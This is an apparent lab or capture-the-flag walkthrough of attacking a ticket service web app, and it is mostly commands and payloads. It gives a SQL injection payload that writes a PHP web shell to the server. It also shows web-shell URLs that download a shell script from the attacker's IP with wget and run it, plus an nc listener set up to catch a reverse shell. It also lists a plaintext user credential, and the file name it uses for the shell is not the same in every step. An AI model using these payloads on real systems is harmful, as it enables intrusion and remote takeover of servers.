17445
Seems to be a ticket service.
Registering and creating a new user and logging in as issue_user : ManagementInsideOld797

Now checking the parameter in the code: It is vulnerable for SQL injection
We can head to that url:
Interrupting the page in burpsuite: We can change add the priority parameter:
We have a 400 bad request error.
But trying with POST request: It's successful.
Now we can write the webshell to the path discovered from port [[30455]]
' union select '<?php system($_GET["cmd"]); ?>' into outfile '/srv/http/webshell.php' -- -

Now navigating to http://192.168.155.147:30455/webshell.php?cmd=id
To get a reverse shell: Start a python server:
python3 -m http.server 30455
Setup a listener:
sudo rlwrap nc -nlvp 443
Then:
http://192.168.155.147:30455/shell.php?cmd=wget http://192.168.45.182/shell.sh
http://192.168.155.147:30455/shell.php?cmd=bash%20shell.sh
We get a shell:
Last updated
Was this helpful?